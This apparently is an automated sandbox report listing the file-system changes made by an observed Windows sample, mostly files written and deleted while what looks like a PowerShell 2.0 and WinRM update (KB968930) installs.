C:\ae90c0f98410dabe3b7635b5ceb43e\profile.ps1 (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_try_catch_finally.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremoteshell.adm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wtrinstaller.ico (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_preference_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmwmipl.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_type_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_execution_policies.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_trap.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_throw.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_providers.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_prompts.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\getevent.types.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_blocks.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_assignment_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\importallmodules.psd1 (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_reserved_words.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_escape_characters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_path_syntax.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_quoting_rules.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_types.ps1xml.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pscustomsetuputil.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmres.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_bits_cmdlets.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_if.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe.mui (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arithmetic_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_job_details.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_regular_expressions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_redirection.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.resources.dll (0 bytes)
C:\_869453_ (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_modules.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_logical_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spmsg.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wevtfwd.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\diagnostics.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.mof (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.cmd (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_split.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\types.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\filesystem.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scopes.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.vbs (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_switch.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_methods.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\registry.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_requirements.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_commonparameters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershelltrace.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_transactions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pipelines.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\default.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_history.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.ver (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\spcustom.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pspluginwkr.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshsip.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_jobs.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_data_sections.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsman.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_core_commands.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\dotnettypes.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_session_configurations.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_ise.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_format.ps1xml.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll (0 bytes)

The process ngen.exe:4084 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)

The process ngen.exe:3616 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3712 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (474 bytes)

The process ngen.exe:3636 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:3672 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (468 bytes)

The process ngen.exe:252 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1418 bytes)

The process ngen.exe:3652 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:4092 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (486 bytes)

The process ngen.exe:3576 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:492 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (728 bytes)

The process ngen.exe:364 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (782 bytes)

The process ngen.exe:3628 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:3600 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process ngen.exe:3660 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:3608 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:1796 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1098 bytes)

The process ngen.exe:3524 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:3644 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:3720 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (826 bytes)

The process ngen.exe:3704 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1140 bytes)

The process ngen.exe:3560 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:3680 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (800 bytes)

The process ngen.exe:3548 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process update.exe:304 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10136 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5648 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5193 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (2630 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (135629 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (245581 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)

The Malware deletes the following file(s):

%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
